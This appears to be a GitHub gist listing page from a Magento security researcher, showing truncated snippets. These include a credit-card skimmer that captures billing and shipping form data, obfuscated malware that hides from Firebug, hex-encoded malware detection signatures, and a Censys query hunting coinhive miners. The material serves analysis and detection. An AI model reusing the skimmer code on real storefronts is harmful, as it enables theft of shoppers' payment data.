Willem de Groot gwillem

gwillem / pageseal.js
Created September 16, 2018 00:57
Page Seal partially de-obfuscated
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
const dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`,
{ url: "https://example.org/" });
var window = dom.window
var document = window.document
var $ = require("jquery")(window);
var jQuery = $;
gwillem / stats.txt
Created September 6, 2018 11:48
top malware signature hits for 2018-09-06
4424 magentocore.net/
4023 \x6D\x61\x67\x65\x6E\x74\x6F\x63\x6F\x72\x65\x2E\x6E\x65\x74
4009 \x22\x63\x63\x5F\x65\x78\x70
772 \x63\x68\x65\x63\x6B\x6F\x75\x74
728 \x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C
699 \x6F\x6E\x65\x70\x61\x67\x65
685 CoinHive.
678 \x63\x68\x65\x63\x6B\x6F\x75\x74\x7C
669 \x6F\x6E\x65\x73\x74\x65\x70
648 \x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74
package main
import (
"fmt"
"io/ioutil"
"log"
"strings"
"testing"
"time"
gwillem / screenshot-upload.sh
Created March 13, 2018 12:41
One button screenshot uploader for Ubuntu
#!/bin/bash
# Requires xclip.
# Creates a screenshot, uploads it to your server over SSH and copies the URL to the clipboard for your pleasure.
SRC_PATH="$1"
SRC_FILE=$(/usr/bin/basename "$SRC_PATH")
PREFIX=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 24 | head -n 1)
DST_FILE="${PREFIX}.png"
gwillem / censys-coinhive.py
Created November 10, 2017 11:29
censys coinhive query
#!/usr/bin/env python
import os
import censys.websites, censys.ipv4
UID = os.getenv('CENSYS_UID')
KEY = os.getenv('CENSYS_KEY')
NEEDLE='coinhive.min.js'

M2 Fingerprint Kata

Objective: create an algorithm that identifies the version of a remote M2 install by examining at most 5 URIs (limited so as not to overload the remote server).

Background: I created a somewhat optimal set of fingerprints for Magento 1. However, for M2 there are fewer unique characteristics. I suspect that combining multiple fingerprints will yield better results. But how to establish the optimal set of fingerprint combinations?

Corpus

Use a list of 234 static files that have different checksums for different M2 versions.

gwillem / malware-that-detects-firebug-developer-tools.js
Created April 11, 2017 10:26
www.MageReport.com now checks for malware that disables itself when Firebug is detected
! function(n, e, i) {
function t(n, e, i) {
for (var t = e % n.length, r = ""; r.length < n.length; t = (t + i) % n.length) r += n.charAt(t);
return r
}
function r(n, e) {
var i, r, o, c = function(n) {
var e = document.getElementById(n);
return e ? e.value || "" : ""
function loadReports() {
$.post("/home/getReports", {
page: 1
}, function(n) {
document.pageNumber = 1;
document.additionalNumber = 1;
viewReports(n)
});
$.post("/home/getServers", function(n) {
viewServers(n)
gwillem / pubkey.txt
Last active August 4, 2018 11:32
Willem pub key
ssh-rsa [key data elided] willem2018
gwillem / malware.js
Created March 21, 2017 21:20
Sophisticated CC skimming malware
f1 = f2 = f3 = null;
se = false;
if ((f1 = jQuery('form:has([name^=billing])')).size()) f1.change(function() {
localStorage.setItem('__billing123', [this.id, $(this).serialize()])
});
if ((f2 = jQuery('form:has([name^=shipping])')).size()) f2.change(function() {
localStorage.setItem('__shipping123', [this.id, $(this).serialize()])
});
function ebn(n) {